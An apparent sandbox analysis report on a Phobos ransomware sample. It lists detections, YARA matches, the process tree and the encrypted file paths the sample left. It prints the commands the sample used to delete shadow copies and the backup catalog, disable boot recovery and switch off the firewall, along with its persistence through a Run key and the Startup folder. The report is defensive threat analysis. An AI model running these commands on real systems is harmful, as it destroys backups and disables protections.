
Windows Analysis Report
Fast.exe

Overview

General Information

Sample name: Fast.exe
Analysis ID: 1388428
MD5: ea6d3083f8c1c506fbff457bf09a7ed8
SHA1: f159c4fc7d13571e725f0ae9e0749c77cf859b4e
SHA256: 000db71531e5aa8b30594d305bb3fbce8e2c71f66e2170091ef58b3c1f306f46
Tags: exe, phobos, ransomware

Detection

Phobos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
Yara detected Phobos
Creates files in the recycle bin to hide itself
Creates files inside the volume driver (system volume information)
Deletes shadow drive data (may be related to ransomware)
Deletes the backup plan of Windows
Drops PE files to the startup folder
Found evasive API chain (may stop execution after checking locale)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies the windows firewall
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Uses bcdedit to modify the Windows boot settings
Uses netsh to modify the Windows network and firewall settings
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • Fast.exe (PID: 7608 cmdline: C:\Users\user\Desktop\Fast.exe MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
    • Fast.exe (PID: 7652 cmdline: C:\Users\user\Desktop\Fast.exe MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
    • cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 7924 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • WMIC.exe (PID: 1196 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • bcdedit.exe (PID: 796 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 7372 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • wbadmin.exe (PID: 7820 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7932 cmdline: netsh advfirewall set currentprofile state off MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • netsh.exe (PID: 8036 cmdline: netsh firewall set opmode mode=disable MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • Fast.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • Fast.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • Fast.exe (PID: 2540 cmdline: "C:\Users\user\AppData\Local\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • wbengine.exe (PID: 3620 cmdline: C:\Windows\system32\wbengine.exe MD5: 17270A354A66590953C4AAC1CF54E507)
  • vdsldr.exe (PID: 7952 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • vds.exe (PID: 8000 cmdline: C:\Windows\System32\vds.exe MD5: 0781CE7ECCD9F6318BA72CD96B5B8992)
  • Fast.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • cleanup
Name: Phobos
Description: MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn't surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos
No configs have been found
Yara matches (sample)
Source: Fast.exe, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: Fast.exe, Rule: MALWARE_Win_Phobos, Description: Detects Phobos ransomware, Author: ditekshen, Strings:
  • 0x8d98:$x1: \\?\UNC\\\e-
  • 0x8c24:$x2: \\?\ :
  • 0x8dc4:$x3: POST
  • 0x8dd0:$s1: ELVL
  • 0xa7:$s3: 41 31 47 49 41 2B
  • 0xaf:$s3: 41 31 47 7D 41 2B
  • 0xbf:$s3: 41 31 47 4A 41 2B
Yara matches (memory dumps)
Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Yara matches (unpacked PE files)
Source: 14.0.Fast.exe.d0000.0.unpack, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: 14.0.Fast.exe.d0000.0.unpack, Rule: MALWARE_Win_Phobos, Description: Detects Phobos ransomware, Author: ditekshen, Strings:
  • 0x8d98:$x1: \\?\UNC\\\e-
  • 0x8c24:$x2: \\?\ :
  • 0x8dc4:$x3: POST
  • 0x8dd0:$s1: ELVL
  • 0xa7:$s3: 41 31 47 49 41 2B
  • 0xaf:$s3: 41 31 47 7D 41 2B
  • 0xbf:$s3: 41 31 47 4A 41 2B
Source: 14.2.Fast.exe.d0000.0.unpack, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Source: 14.2.Fast.exe.d0000.0.unpack, Rule: MALWARE_Win_Phobos, Description: Detects Phobos ransomware, Author: ditekshen, Strings:
  • 0x8d98:$x1: \\?\UNC\\\e-
  • 0x8c24:$x2: \\?\ :
  • 0x8dc4:$x3: POST
  • 0x8dd0:$s1: ELVL
  • 0xa7:$s3: 41 31 47 49 41 2B
  • 0xaf:$s3: 41 31 47 7D 41 2B
  • 0xbf:$s3: 41 31 47 4A 41 2B
Source: 19.2.Fast.exe.d0000.0.unpack, Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Author: unknown, Strings:
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89

Operating System Destruction

Source: Process started; Author: Joe Security; Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Windows\system32\cmd.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7756, ParentProcessName: cmd.exe, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 1196, ProcessName: WMIC.exe

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades); Data: Command: vssadmin delete shadows /all /quiet, CommandLine: vssadmin delete shadows /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: C:\Windows\system32\cmd.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7756, ParentProcessName: cmd.exe, ProcessCommandLine: vssadmin delete shadows /all /quiet, ProcessId: 7924, ProcessName: vssadmin.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Fast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Fast.exe, ProcessId: 7608, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fast
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\Fast.exe, ProcessId: 7608, TargetFilename: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\Fast.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Fast.exe" , CommandLine: "C:\Users\user\AppData\Local\Fast.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Fast.exe, NewProcessName: C:\Users\user\AppData\Local\Fast.exe, OriginalFileName: C:\Users\user\AppData\Local\Fast.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\Fast.exe" , ProcessId: 4828, ProcessName: Fast.exe
No Snort rule has matched


AV Detection

Source: Fast.exe; Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe; ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Fast.exe; ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe; ReversingLabs: Detection: 89%
Source: Fast.exe; ReversingLabs: Detection: 89%
Source: Fast.exe; Joe Sandbox ML: detected
Source: Fast.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroDunamis.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Adobe.Acrobat.Dependencies.manifest.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\adobeafp.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeLinguistic.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeXMP.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AGMGPUOptIn.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ahclient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ANCUtility.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXE8SharedExpat.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXSLE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIB.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIBUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\manifest.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_asym.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base_non_fips.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_ecc.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRClient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.sig.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cr_win_client_config.cfg.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DirectInk.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. FOIA.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. Privacy Act.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\LocaleDisplayNameMap.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ExtendScript.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\JP2KLib.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\eula.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
